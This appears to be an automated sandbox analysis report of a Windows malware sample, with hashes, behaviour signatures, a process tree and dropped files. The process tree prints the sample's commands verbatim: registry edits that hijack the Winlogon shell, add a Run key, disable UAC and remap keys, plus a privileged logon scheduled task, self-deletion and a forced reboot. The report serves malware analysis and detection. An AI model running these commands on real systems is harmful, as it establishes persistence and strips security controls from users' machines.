Analysis

  • max time kernel
    33s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/03/2024, 16:47

Errors

Reason
Machine shutdown

General

  • Target

  • Size
    315KB
  • MD5
    9f8bc96c96d43ecb69f883388d228754
  • SHA1
    61ed25a706afa2f6684bb4d64f69c5fb29d20953
  • SHA256
    7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
  • SHA512
    550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
  • SSDEEP
    6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Admin\AppData\Local\del.bat
        3⤵
        • Deletes itself
        PID:3000
      • C:\Windows\SysWOW64\SCHTASKS.exe
        C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2608
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Modifies WinLogon for persistence
          PID:2684
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Adds Run key to start application
          PID:2624
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          4⤵
          PID:2472
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
          4⤵
          PID:2404
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
          4⤵
          PID:2840
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
          4⤵
          • UAC bypass
          PID:2808
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
        3⤵
        PID:2096
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
          4⤵
          PID:1260
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
        3⤵
        PID:1608
        • C:\Windows\SysWOW64\shutdown.exe
          shutdown -r -t 10 -f
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1768
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:1672
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Checks processor information in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    PID:2788
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2848
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:844
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    1⤵
    PID:2252

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\del.bat
    Filesize
    76B
    MD5
    dda69d69d2bf9994650f6c0df260fd80
    SHA1
    94041b483a3b0cda19339bddf09f1bd1b2242fea
    SHA256
    a2126c0c0b9d7401a20582ada62be413320cebb86dff164e5cb91bec7b6aa898
    SHA512
    7e70d053cd60110011844a699eba9a25065cdb2827fd72f379a67f479eb2ddc346223c39e3c2781dc16b8e07915737aba513b5eae57d38e88d46eae318a579ac
  • C:\Users\Admin\Documents\1.R5A
    Filesize
    11KB
    MD5
    efb59856d6da6005405673e22c81eb68
    SHA1
    d34dcc9df9c4f8b172a9e43c204ee38a2a5febe6
    SHA256
    17f29595124e30cf515a8fe04239437b32f6a0edbcbd22bcfb373be3bd2fbc23
    SHA512
    71898e1fc305f5d992bcf7949eabf3ad52290df29a3742ebbabccae407ba2b676fb6e74a8c5c1867be501ad6d22c46780d45e8d3befecbc2f502d76d4834ffa2
  • C:\Users\Admin\Documents\2.R5A
    Filesize
    11KB
    MD5
    b53435b65e8e54e8ef0821ef8fc18858
    SHA1
    a2875aa6726884bbd8a6b7662cf1ea4a132471b4
    SHA256
    fe6a36cf7c5426a71dd305cba3e45fe3e069e6a951a9880dc6110f7604b8f11f
    SHA512
    5ed6f091f3a9f97a7c024fd8e2b720380c6310d533e53acecf08ecc6ee9f03a7b54290921bea9adee917de72ff9f707c21d2b3096c8e290579dba2adf90a28d8
  • C:\Users\Admin\Documents\3.R5A
    Filesize
    572KB
    MD5
    89599fa9cbfe8f76bc01aece893ea69b
    SHA1
    9a2d1dd8a60065895c9f126c71c21630b430cc3d
    SHA256
    4885851edadb2bc1c4063844d884c3228e473e2848bfc345e4584d4fdd61c11f
    SHA512
    9e9cdde83441b0f86dd373a8c3cedaedefd1e2f1cac6b6c5baba52d158c7c8eb7a13d06a149659698a67bc661cdbe3b57ee2bb5586c2332e36eae99792085eaa
  • C:\Users\Admin\Documents\4.R5A
    Filesize
    260KB
    MD5
    7750c2660e1280ec6ca5afeff98bff57
    SHA1
    321429544fee0518119a8a501dc304f181dfba49
    SHA256
    f59ac0811b36edf973f14cfbdb43af2f4efe03ac5cff231ec76b0e43e5f2fb55
    SHA512
    982ee3a5c9d37b64572b1772eb748997c878e9d5ae7a3d1748b48c94c9b71fe63dc52d4c3edd7e74c462f7a33f763b0bd49fa10ca833dafd65912c582b051e51
  • C:\Users\Admin\Documents\5.R5A
    Filesize
    11KB
    MD5
    cfaf5a3cfd727880ffa9cad8378ab27d
    SHA1
    95adbd2fcf96e714925d6d1033777f318c36cc86
    SHA256
    8a7df45e942d65a653f36662528974c36791687d4f3fcfc976378eb424b38432
    SHA512
    447dcb4ff4cbe06db57bfcc0c61da1ebf5501805f0664f35ca42e9c28f658ae840adf3a264f276a349b39caa23b845b09b1a5bf3a1345ca6ecae473fc9b74304
  • C:\Users\Admin\Documents\6.R5A
    Filesize
    11KB
    MD5
    b6044f65a414faae440f08df3e0d5e0e
    SHA1
    5e81f3df21e1a71b6b2f8a92ac5b5d8944325d40
    SHA256
    53ce41885b9d87a9f8ebd67f00dceeadf289f3eeaf4e48b7c95f8f63fa7c9393
    SHA512
    45e87e59279e6918c016f5bc5086a67ec17b9647c5fcfa6fbd47dfb213f78261aa40c80a0316979db5e74012a9de1f9b0a221a6209b27a33ebb6ff068d371c27
  • C:\Users\Admin\Documents\7.R5A
    Filesize
    11KB
    MD5
    8a83a64796f007abba309dedb7e2e0a5
    SHA1
    83452d93d7120f82d6b0a7b8b225ba6d1e736ed2
    SHA256
    8143db1d3a9d172bce528a3e4bdc10651835b37665c298fc815f5b517084de82
    SHA512
    d0d2008242da1eecc45fec5673c8dbf8a189060f015968bc69d730fba8bc1a937d3e356dedf46b8bd0e6902d88ffe0d3232804f2b2bf297f86a26a509f3b3148
  • C:\Users\Admin\Documents\8.R5A
    Filesize
    396KB
    MD5
    b897695f2a141ad5d4d3a43689995766
    SHA1
    6481798f95fdb9b2515ac53ba61b3a7ffc67b868
    SHA256
    58b7bcb5e872ef7ad1582de1c669d6ed419ced828bbd0cd7eff7f3081f62fc20
    SHA512
    dce5e9c8ff98770513245022bac85ba8babb6838e13c5503e50d6eb2530cacfb208ba19784dbd701a2c2a0a3ef68119b824ddb2b3810829847f2e1bc0a5ee969
  • \Users\Admin\AppData\Local\system.exe
    Filesize
    315KB
    MD5
    51edf9d3b666b2ac9ba583912315a599
    SHA1
    fe4e5afd2efa7276d18899b06c1608b1dc049aef
    SHA256
    2ca106b9f12b26929f660342133f6bed9ebe019480a587249408bd5523725ac7
    SHA512
    82c255417e1c61f71380f02298c81f89811817a9a275d8e41a0137fb823922f74643a6d2cbd0f61cc50c259d6be4af1b01c66e59ee1ebc2c3ebfe38bf8feb0b4
  • memory/844-123-0x00000000029C0000-0x00000000029C1000-memory.dmp
    Filesize
    4KB
  • memory/2252-126-0x00000000026E0000-0x00000000026E1000-memory.dmp
    Filesize
    4KB
  • memory/2788-102-0x0000000003640000-0x0000000003650000-memory.dmp
    Filesize
    64KB
  • memory/2788-101-0x0000000003630000-0x0000000003631000-memory.dmp
    Filesize
    4KB
  • memory/2848-121-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/2848-122-0x0000000071D1D000-0x0000000071D28000-memory.dmp
    Filesize
    44KB
  • memory/2848-124-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/2848-125-0x0000000071D1D000-0x0000000071D28000-memory.dmp
    Filesize
    44KB